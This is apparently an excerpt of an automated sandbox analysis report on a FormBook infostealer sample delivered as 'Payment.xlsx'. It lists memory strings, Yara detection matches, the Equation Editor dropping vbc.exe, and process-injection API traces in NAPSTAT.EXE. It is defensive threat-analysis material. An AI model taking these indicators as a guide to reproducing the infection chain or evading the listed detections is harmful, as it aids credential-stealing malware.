          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2171469708.0000000002281000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: C:\Users\Public\vbc.exe, Window created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exe, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Memory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Memory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFA20 NtQueryInformationFile,9_2_01FEFA20
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF1D80 NtSuspendThread,9_2_01FF1D80
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFD5C NtEnumerateKey,9_2_01FEFD5C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC90 NtUnmapViewOfSection,9_2_01FEFC90
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC48 NtSetInformationFile,9_2_01FEFC48
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FF0C40 NtGetContextThread,9_2_01FF0C40
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFC30 NtOpenProcess,9_2_01FEFC30
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFFFC NtCreateProcessEx,9_2_01FEFFFC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFF34 NtQueueApcThread,9_2_01FEFF34
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFEA0 NtReadVirtualMemory,9_2_01FEFEA0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_01FEFE24 NtWriteVirtualMemory,9_2_01FEFE24
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_000981B0 NtCreateFile,9_2_000981B0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00098260 NtReadFile,9_2_00098260
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_000982E0 NtClose,9_2_000982E0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00098390 NtAllocateVirtualMemory,9_2_00098390
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00098392 NtAllocateVirtualMemory,9_2_00098392
          Source: Payment.xlsx, OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\Public\vbc.exe, Code function: String function: 00B83F92 appears 108 times
          Source: C:\Users\Public\vbc.exe, Code function: String function: 00BAF970 appears 81 times
          Source: C:\Users\Public\vbc.exe, Code function: String function: 00B8373B appears 238 times
          Source: C:\Users\Public\vbc.exe, Code function: String function: 00B3DF5C appears 118 times
          Source: C:\Users\Public\vbc.exe, Code function: String function: 00B3E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 01FFDF5C appears 118 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 0204373B appears 238 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 02043F92 appears 108 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 0206F970 appears 81 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: String function: 01FFE2A8 appears 38 times
          Source: so[1].exe.2.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
